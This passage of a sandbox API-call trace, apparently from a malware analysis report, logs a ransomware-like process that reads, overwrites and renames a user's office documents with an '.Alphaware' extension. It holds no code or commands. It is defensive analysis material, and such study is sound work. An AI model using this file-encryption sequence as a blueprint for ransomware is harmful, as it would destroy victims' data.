ftCreationTime.dwLowDateTime=0x5652cdc0, ftCreationTime.dwHighDateTime=0x1d96e70, ftLastAccessTime.dwLowDateTime=0x9c1979f0, ftLastAccessTime.dwHighDateTime=0x1d975c6, ftLastWriteTime.dwLowDateTime=0x9c1979f0, ftLastWriteTime.dwHighDateTime=0x1d975c6, nFileSizeHigh=0x0, nFileSizeLow=0x1139d)) returned 1 [0084.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.598] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.598] GetFileType (hFile=0x254) returned 0x1 [0084.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.598] GetFileType (hFile=0x254) returned 0x1 [0084.598] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x1139d [0084.598] ReadFile (in: hFile=0x254, lpBuffer=0x23ef270, nNumberOfBytesToRead=0x1139d, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ef270*, lpNumberOfBytesRead=0x23e9f8*=0x1139d, lpOverlapped=0x0) returned 1 [0084.600] CloseHandle (hObject=0x254) returned 1 [0084.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.642] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.644] GetFileType (hFile=0x254) returned 0x1 [0084.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.644] GetFileType (hFile=0x254) returned 0x1 [0084.649] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.649] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.650] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.650] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.650] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.651] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.651] WriteFile (in: hFile=0x254, lpBuffer=0x24b08f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b08f8*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.652] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5652cdc0, ftCreationTime.dwHighDateTime=0x1d96e70, ftLastAccessTime.dwLowDateTime=0x9c1979f0, ftLastAccessTime.dwHighDateTime=0x1d975c6, ftLastWriteTime.dwLowDateTime=0x84a82600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17048)) returned 1 [0084.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.652] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp.alphaware")) returned 1 [0084.656] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc", dwFileAttributes=0x80) returned 1 [0084.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc"), fInfoLevelId=0x0, lpFileInformation=0x24b1d20 | out: lpFileInformation=0x24b1d20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19230a70, ftCreationTime.dwHighDateTime=0x1d96c84, ftLastAccessTime.dwLowDateTime=0xf1687e70, ftLastAccessTime.dwHighDateTime=0x1d97269, ftLastWriteTime.dwLowDateTime=0xf1687e70, ftLastWriteTime.dwHighDateTime=0x1d97269, nFileSizeHigh=0x0, nFileSizeLow=0x8b18)) returned 1 [0084.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.657] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.657] ReadFile (in: hFile=0x254, lpBuffer=0x24b1f98, nNumberOfBytesToRead=0x8b18, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b1f98*, lpNumberOfBytesRead=0x23e9f8*=0x8b18, lpOverlapped=0x0) returned 1 [0084.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.700] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19230a70, ftCreationTime.dwHighDateTime=0x1d96c84, ftLastAccessTime.dwLowDateTime=0xf1687e70, ftLastAccessTime.dwHighDateTime=0x1d97269, ftLastWriteTime.dwLowDateTime=0x84af4a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xba48)) returned 1 [0084.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.706] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\DMtfYZ.doc.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\dmtfyz.doc.alphaware")) returned 1 [0084.707] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls", dwFileAttributes=0x80) returned 1 [0084.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls"), fInfoLevelId=0x0, lpFileInformation=0x24439f8 | out: lpFileInformation=0x24439f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x3c407d30, ftCreationTime.dwHighDateTime=0x1d9725b, ftLastAccessTime.dwLowDateTime=0x7ebf7a90, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x7ebf7a90, ftLastWriteTime.dwHighDateTime=0x1d975a2, nFileSizeHigh=0x0, nFileSizeLow=0x12bac)) returned 1 [0084.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.707] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.708] ReadFile (in: hFile=0x254, lpBuffer=0x2443cd0, nNumberOfBytesToRead=0x12bac, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2443cd0*, lpNumberOfBytesRead=0x23e9f8*=0x12bac, lpOverlapped=0x0) returned 1 [0084.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.747] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c407d30, ftCreationTime.dwHighDateTime=0x1d9725b, ftLastAccessTime.dwLowDateTime=0x7ebf7a90, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x84b66e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19060)) returned 1 [0084.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.755] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\IdqAQbUtMr09oklG_Ot.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\idqaqbutmr09oklg_ot.xls.alphaware")) returned 1 [0084.756] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp", dwFileAttributes=0x80) returned 1 [0084.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp"), fInfoLevelId=0x0, lpFileInformation=0x250e568 | out: lpFileInformation=0x250e568*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc63fcc40, ftCreationTime.dwHighDateTime=0x1d96d63, ftLastAccessTime.dwLowDateTime=0x220b28c0, ftLastAccessTime.dwHighDateTime=0x1d9769d, ftLastWriteTime.dwLowDateTime=0x220b28c0, ftLastWriteTime.dwHighDateTime=0x1d9769d, nFileSizeHigh=0x0, nFileSizeLow=0x148f5)) returned 1 [0084.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.757] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.757] ReadFile (in: hFile=0x254, lpBuffer=0x250e800, nNumberOfBytesToRead=0x148f5, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x250e800*, lpNumberOfBytesRead=0x23e9f8*=0x148f5, lpOverlapped=0x0) returned 1 [0084.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.803] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.810] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fcc40, ftCreationTime.dwHighDateTime=0x1d96d63, ftLastAccessTime.dwLowDateTime=0x220b28c0, ftLastAccessTime.dwHighDateTime=0x1d9769d, ftLastWriteTime.dwLowDateTime=0x84bd9260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b774)) returned 1 [0084.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.811] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\k3 HQLaJEyY.odp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\k3 hqlajeyy.odp.alphaware")) returned 1 [0084.812] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx", dwFileAttributes=0x80) returned 1 [0084.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.813] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23f3c10 | out: lpFileInformation=0x23f3c10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x97486200, ftCreationTime.dwHighDateTime=0x1d97496, ftLastAccessTime.dwLowDateTime=0x137463b0, ftLastAccessTime.dwHighDateTime=0x1d975dc, ftLastWriteTime.dwLowDateTime=0x137463b0, ftLastWriteTime.dwHighDateTime=0x1d975dc, nFileSizeHigh=0x0, nFileSizeLow=0xc0a2)) returned 1 [0084.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.813] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.813] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0xc0a2 [0084.813] ReadFile (in: hFile=0x254, lpBuffer=0x23f3f08, nNumberOfBytesToRead=0xc0a2, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23f3f08*, lpNumberOfBytesRead=0x23e9f8*=0xc0a2, lpOverlapped=0x0) returned 1 [0084.933] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx", nBufferLength=0x105, lpBuffer=0x23e360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx", lpFilePart=0x0) returned 0x4c [0084.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.933] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.940] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx", nBufferLength=0x105, lpBuffer=0x23e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx", lpFilePart=0x0) returned 0x4c [0084.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.940] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97486200, ftCreationTime.dwHighDateTime=0x1d97496, ftLastAccessTime.dwLowDateTime=0x137463b0, ftLastAccessTime.dwHighDateTime=0x1d975dc, ftLastWriteTime.dwLowDateTime=0x84d2fec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x101b4)) returned 1 [0084.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.940] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\kxX8q7znVEV6F AiDQyX.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\kxx8q7znvev6f aidqyx.xlsx.alphaware")) returned 1 [0084.941] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf", dwFileAttributes=0x80) returned 1 [0084.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf"), fInfoLevelId=0x0, lpFileInformation=0x24a2348 | out: lpFileInformation=0x24a2348*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xde00db30, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xdc576d20, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xdc576d20, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x99a6)) returned 1 [0084.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.942] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.942] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x99a6 [0084.942] ReadFile (in: hFile=0x254, lpBuffer=0x24a25f0, nNumberOfBytesToRead=0x99a6, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24a25f0*, lpNumberOfBytesRead=0x23e9f8*=0x99a6, lpOverlapped=0x0) returned 1 [0084.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.991] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.994] GetFileType (hFile=0x254) returned 0x1 [0084.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.994] GetFileType (hFile=0x254) returned 0x1 [0084.994] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.995] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.997] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.997] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, 